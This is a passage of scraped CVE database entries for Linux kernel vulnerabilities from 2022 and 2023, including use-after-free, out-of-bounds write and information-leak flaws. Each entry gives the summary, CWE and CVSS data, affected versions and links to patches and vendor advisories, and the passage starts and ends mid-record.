kernel\u2019s TUN/TAP device driver functionality in how a user registers the device when the register_netdevice function fails (NETDEV_REGISTER notifier). This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-460", "description": "CWE-460 -\u003e CWE-824", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-26T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=158b515f703e" }, { "url": "http://packetstormsecurity.com/files/171912/CentOS-Stream-9-Missing-Kernel-Security-Fix.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230526-0009/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-4744", "datePublished": "2023-03-30T00:00:00", "dateReserved": "2022-12-26T00:00:00", "dateUpdated": "2024-08-03T01:48:40.427Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1075
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux Kernel. The tls_is_tx_ready() incorrectly checks for list emptiness, potentially accessing a type confused entry to the list_head, leaking the last byte of the confused field that overlaps with rec->tx_ready.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Linus kernel |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.376Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=ffe2a22562444720b05bdfeb999c03e810d84cbb" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linus kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux Kernel. The tls_is_tx_ready() incorrectly checks for list emptiness, potentially accessing a type confused entry to the list_head, leaking the last byte of the confused field that overlaps with rec-\u003etx_ready." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-200", "description": "CWE-200", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-27T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=ffe2a22562444720b05bdfeb999c03e810d84cbb" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1075", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T05:32:46.376Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0590
Vulnerability from cvelistv5
Published
2023-03-23 00:00
Modified
2024-08-02 05:17
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue. If patch ebda44da44f6 ("net: sched: fix race condition in qdisc_graft()") not applied yet, then kernel could be affected.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:17:49.847Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20221018203258.2793282-1-edumazet%40google.com/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.1-rc2" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue. If patch ebda44da44f6 (\"net: sched: fix race condition in qdisc_graft()\") not applied yet, then kernel could be affected." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:06:27.652362", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/all/20221018203258.2793282-1-edumazet%40google.com/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-0590", "datePublished": "2023-03-23T00:00:00", "dateReserved": "2023-01-31T00:00:00", "dateUpdated": "2024-08-02T05:17:49.847Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4622
Vulnerability from cvelistv5
Published
2023-09-06 13:56
Modified
2024-08-02 07:31
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's af_unix component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:31:06.586Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y\u0026id=790c2f9d15b594350ae9bca7b236f2b1859de02c" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/790c2f9d15b594350ae9bca7b236f2b1859de02c" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.1.47", "status": "affected", "version": "4.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Billy Jheng Bing-Jhong" } ], "datePublic": "2023-08-23T15:52:42+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s af_unix component can be exploited to achieve local privilege escalation.\n\nThe unix_stream_sendpage() function tries to add data to the last skb in the peer\u0027s recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.\n\nWe recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-06T13:56:56.355Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y\u0026id=790c2f9d15b594350ae9bca7b236f2b1859de02c" }, { "url": "https://kernel.dance/790c2f9d15b594350ae9bca7b236f2b1859de02c" }, { "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s af_unix component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-4622", "datePublished": "2023-09-06T13:56:56.355Z", "dateReserved": "2023-08-30T11:57:48.389Z", "dateUpdated": "2024-08-02T07:31:06.586Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2162
Vulnerability from cvelistv5
Published
2023-04-19 00:00
Modified
2024-08-02 06:12
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability was found in iscsi_sw_tcp_session_create in drivers/scsi/iscsi_tcp.c in SCSI sub-component in the Linux Kernel. In this flaw an attacker could leak kernel internal information.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:12:20.601Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/linux-scsi/msg181542.html" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux Kernel version prior to Kernel 6.2 RC6" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability was found in iscsi_sw_tcp_session_create in drivers/scsi/iscsi_tcp.c in SCSI sub-component in the Linux Kernel. In this flaw an attacker could leak kernel internal information." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://www.spinics.net/lists/linux-scsi/msg181542.html" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-2162", "datePublished": "2023-04-19T00:00:00", "dateReserved": "2023-04-18T00:00:00", "dateUpdated": "2024-08-02T06:12:20.601Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4128
Vulnerability from cvelistv5
** REJECT ** DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-4206, CVE-2023-4207, CVE-2023-4208. Reason: This record is a duplicate of CVE-2023-4206, CVE-2023-4207, CVE-2023-4208. Notes: All CVE users should reference CVE-2023-4206, CVE-2023-4207, CVE-2023-4208 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.
Show details on NVD website{ "containers": { "cna": { "providerMetadata": { "dateUpdated": "2023-11-14T11:27:04.495Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "rejectedReasons": [ { "lang": "en", "value": "** REJECT ** DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-4206, CVE-2023-4207, CVE-2023-4208. Reason: This record is a duplicate of CVE-2023-4206, CVE-2023-4207, CVE-2023-4208. Notes: All CVE users should reference CVE-2023-4206, CVE-2023-4207, CVE-2023-4208 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage." } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-4128", "datePublished": "2023-08-10T16:50:25.184Z", "dateRejected": "2023-11-14T11:27:04.495Z", "dateReserved": "2023-08-03T06:02:29.894Z", "dateUpdated": "2023-11-14T11:27:04.495Z", "state": "REJECTED" }, "dataType": "CVE_RECORD", "dataVersion": "5.0" }
cve-2023-28772
Vulnerability from cvelistv5
Published
2023-03-23 00:00
Modified
2024-08-02 13:51
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T13:51:37.313Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.3" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/d3b16034a24a112bb83aeb669ac5b9b01f744bb7" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20210625122453.5e2fe304%40oasis.local.home/" }, { "tags": [ "x_transferred" ], "url": "https://lkml.kernel.org/r/20210626032156.47889-1-yun.zhou%40windriver.com" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230427-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-27T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.3" }, { "url": "https://github.com/torvalds/linux/commit/d3b16034a24a112bb83aeb669ac5b9b01f744bb7" }, { "url": "https://lore.kernel.org/lkml/20210625122453.5e2fe304%40oasis.local.home/" }, { "url": "https://lkml.kernel.org/r/20210626032156.47889-1-yun.zhou%40windriver.com" }, { "url": "https://security.netapp.com/advisory/ntap-20230427-0005/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-28772", "datePublished": "2023-03-23T00:00:00", "dateReserved": "2023-03-23T00:00:00", "dateUpdated": "2024-08-02T13:51:37.313Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-35823
Vulnerability from cvelistv5
Published
2023-06-18 00:00
Modified
2024-08-02 16:30
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in saa7134_finidev in drivers/media/pci/saa7134/saa7134-core.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T16:30:45.398Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/49bb0b6a-e669-d4e7-d742-a19d2763e947%40xs4all.nl/" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20230318085023.832510-1-zyytlz.wz%40163.com/t/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=30cf57da176cca80f11df0d9b7f71581fe601389" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230803-0002/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in saa7134_finidev in drivers/media/pci/saa7134/saa7134-core.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-19T23:06:37.069715", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2" }, { "url": "https://lore.kernel.org/all/49bb0b6a-e669-d4e7-d742-a19d2763e947%40xs4all.nl/" }, { "url": "https://lore.kernel.org/lkml/20230318085023.832510-1-zyytlz.wz%40163.com/t/" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=30cf57da176cca80f11df0d9b7f71581fe601389" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230803-0002/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-35823", "datePublished": "2023-06-18T00:00:00", "dateReserved": "2023-06-18T00:00:00", "dateUpdated": "2024-08-02T16:30:45.398Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6931
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2024-08-02 08:42
Severity ?
EPSS score ?
Summary
Out-of-bounds write in Linux kernel's Performance Events system component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:42:08.665Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.7", "status": "affected", "version": "4.3", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Budimir Markovic" } ], "datePublic": "2023-11-29T14:43:50+00:00", "descriptions": [ { "lang": "en", "value": "A heap out-of-bounds write vulnerability in the Linux kernel\u0027s Performance Events system component can be exploited to achieve local privilege escalation.\n\nA perf_event\u0027s read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group().\n\nWe recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-19T14:09:14.085Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "url": "https://kernel.dance/382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Out-of-bounds write in Linux kernel\u0027s Performance Events system component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-6931", "datePublished": "2023-12-19T14:09:14.085Z", "dateReserved": "2023-12-18T20:13:06.510Z", "dateUpdated": "2024-08-02T08:42:08.665Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4132
Vulnerability from cvelistv5
Published
2023-08-03 14:32
Modified
2024-09-13 18:23
Severity ?
EPSS score ?
Summary
Kernel: smsusb: use-after-free caused by do_submit_urb()
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2023:6901 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:7077 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0575 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0724 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-4132 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2221707 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-4132", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-25T15:30:20.281573Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:27:22.320Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.143Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4132" }, { "name": "RHBZ#2221707", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2221707" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231020-0005/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.rt7.307.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.43.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Duoming Zhou for reporting this issue." } ], "datePublic": "2023-02-08T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability was found in the siano smsusb module in the Linux kernel. The bug occurs during device initialization when the siano device is plugged in. This flaw allows a local user to crash the system, causing a denial of service condition." } ], "metrics": [ { "other": { "content": { "namespace": 